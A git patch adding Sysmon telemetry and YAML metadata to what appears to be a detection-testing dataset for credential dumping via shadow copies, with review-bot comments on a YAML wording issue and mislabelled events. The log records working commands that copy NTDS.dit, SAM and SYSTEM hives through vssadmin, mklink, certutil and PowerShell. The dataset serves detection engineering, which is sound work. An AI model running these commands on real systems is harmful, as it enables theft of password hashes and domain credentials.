From 2ca7135b0db3dfd8cd9ab7331f3179e6e25f3024 Mon Sep 17 00:00:00 2001
From: P4T12ICK
Date: Mon, 3 Nov 2025 16:53:00 +0100
Subject: [PATCH 1/2] Add YAML metadata for T1003.003

---
 .../credential-dumping-via-symlink.yml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml

diff --git a/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml
new file mode 100644
index 00000000..d1221ab6
--- /dev/null
+++ b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/credential-dumping-via-symlink.yml
@@ -0,0 +1,14 @@
+author: PB
+id: 6143fa9b-ee6b-43e2-8bfb-b3240cc6e84b
+date: '2025-11-03'
+description: Attack data for detection Credential Dumping via Symlink to Shadow Copy
+ New
+environment: attack_range
+directory: credential-dumping-via-symlink
+mitre_technique:
+- T1003.003
+datasets:
+- name: data
+ path: datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log
+ sourcetype: XmlWinEventLog
+ source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

From 06a8cded568d118755c68bc8808afbd1a6b09e59 Mon Sep 17 00:00:00 2001
From: P4T12ICK
Date: Mon, 3 Nov 2025 16:53:02 +0100
Subject: [PATCH 2/2] Add attack data for T1003.003

---
 .../credential-dumping-via-symlink/data.log | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log

diff --git a/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log
new file mode 100644
index 00000000..c6210d69
--- /dev/null
+++ b/datasets/attack_techniques/T1003.003/credential-dumping-via-symlink/data.log
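Review bot: The `description` value wraps onto a continuation line, so as a YAML plain scalar it folds to `Attack data for detection Credential Dumping via Symlink to Shadow Copy New`, which reads as if `New` were part of the detection's name. If it is not, drop the continuation line `New`; if the detection really carries that name, keep the whole value on one line and quote the name, e.g. `description: Attack data for detection "Credential Dumping via Symlink to Shadow Copy New"`, so the dataset-to-detection mapping is unambiguous for whoever maintains the test that consumes this file.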
@@ -0,0 +1,19 @@ +154100x80000000000000001814Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:42.957{506a9d8f-7b6a-6908-6f07-000000007003}3100C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c vssadmin.exe create shadow /for=C: & mklink /D C:\Temp\vssstore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b61-6908-0dc1-5b0000000000}0x5bc10d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b63-6908-4a07-000000007003}1068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 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AR-WIN-1\Administrator +154100x80000000000000001795Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:38.141{506a9d8f-7b66-6908-5607-000000007003}1984C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE & reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVEC:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b61-6908-0dc1-5b0000000000}0x5bc10d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b63-6908-4a07-000000007003}1068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 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AR-WIN-1\Administrator 
+154100x80000000000000001748Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:32.108{506a9d8f-7b60-6908-2a07-000000007003}4228C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1) C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b5c-6908-9d11-5b0000000000}0x5b119d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b5d-6908-0e07-000000007003}1656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMAAR-WIN-1\Administrator +154100x80000000000000001746Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:52:32.064{506a9d8f-7b60-6908-2707-000000007003}4180C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1) 
C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-7b5c-6908-9d11-5b0000000000}0x5b119d0HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7b5d-6908-0e07-000000007003}1656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 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-WIN-1\Administrator +154100x80000000000000001627Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:45.194{506a9d8f-798d-6908-c306-000000007003}3340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {1..10 | %% { + try { [System.IO.File]::Copy(\""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM\"" , \""$env:TEMP\SAMvss$_\"", \""true\"") } catch {} + ls \""$env:TEMP\SAMvss$_\"" -ErrorAction Ignore +}}C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{506a9d8f-7980-6908-9306-000000007003}3528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 
WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMACgBJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==AR-WIN-1\Administrator +154100x80000000000000001626Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:45.004{506a9d8f-798d-6908-c206-000000007003}4848C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss10 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001625Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.967{506a9d8f-798c-6908-c106-000000007003}4812C:\Windows\System32\certutil.exe10.0.17763.5696 
(WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy9\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss9 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001624Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.916{506a9d8f-798c-6908-c006-000000007003}3132C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss8 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001623Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.864{506a9d8f-798c-6908-bf06-000000007003}1588C:\Windows\System32\certutil.exe10.0.17763.5696 
(WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss7 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001622Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.820{506a9d8f-798c-6908-be06-000000007003}3584C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy6\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss6 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001621Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.776{506a9d8f-798c-6908-bd06-000000007003}484C:\Windows\System32\certutil.exe10.0.17763.5696 
(WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss5 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001620Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.697{506a9d8f-798c-6908-bc06-000000007003}3832C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss4 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001619Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.658{506a9d8f-798c-6908-bb06-000000007003}3580C:\Windows\System32\certutil.exe10.0.17763.5696 
(WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss3 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001618Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.622{506a9d8f-798c-6908-ba06-000000007003}5016C:\Windows\System32\certutil.exe10.0.17763.5696 (WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss2 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001617Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.495{506a9d8f-798c-6908-b906-000000007003}2744C:\Windows\System32\certutil.exe10.0.17763.5696 
(WinBuild.160101.0800)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.execertutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss1 2 C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=E53CE0751C3D4C884A5FFF753462EFFA,SHA256=98D63F0F44C8AFAF1A4B11E38E92F81ADD7F59FD1FF7B296FC3D40C7F0094177,IMPHASH=683B8A445B00A271FC57848D893BD6C4{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe"cmd.exe" /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*AR-WIN-1\Administrator +154100x80000000000000001616Microsoft-Windows-Sysmon/Operationalar-win-1-2025-11-03 09:44:44.425{506a9d8f-798c-6908-b706-000000007003}4436C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c for /L %%a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%%a\Windows\System32\config\SAM" %%temp%%\SAMvss%%a 2 >nul 2>&1) & dir /B %%temp%%\SAMvss*C:\Users\ADMINI~1\AppData\Local\Temp\AR-WIN-1\Administrator{506a9d8f-797d-6908-16d9-240000000000}0x24d9160HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{506a9d8f-7980-6908-9306-000000007003}3528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 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AR-WIN-1\Administrator
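Review bot: The twelve events with EventRecordID 1616–1627 (timestamped 2025-11-03 09:44:44–09:44:45: the `cmd.exe /c for /L %a in (1,1,10) do @(certutil -f -v -encodehex ... \config\SAM ...)` loop, its ten `certutil.exe` children and the PowerShell `[System.IO.File]::Copy(... \config\SAM ...)` loop) look like they belong to a different atomic test than the one this dataset is labelled for. Their parent PowerShell `-encodedcommand` argument is UTF-16LE base64 that, as far as I can read it, decodes to `Invoke-AtomicTest "T1003.002" -Confirm:$false ...`, whereas the 09:52 events' parent decodes to `Invoke-AtomicTest "T1003.003" -GetPrereqs`; please confirm by decoding locally. If that reading is right, a dataset named T1003.003 carries SAM-hive dumping events from T1003.002, which would inflate hit counts for any SAM/certutil detection run against it and leaves the YAML's `mitre_technique` list incomplete. Either trim `data.log` to the 09:52 symlink/NTDS events (record IDs 1746–1814) or add `T1003.002` to `mitre_technique` and say in the `description` that the log covers both tests.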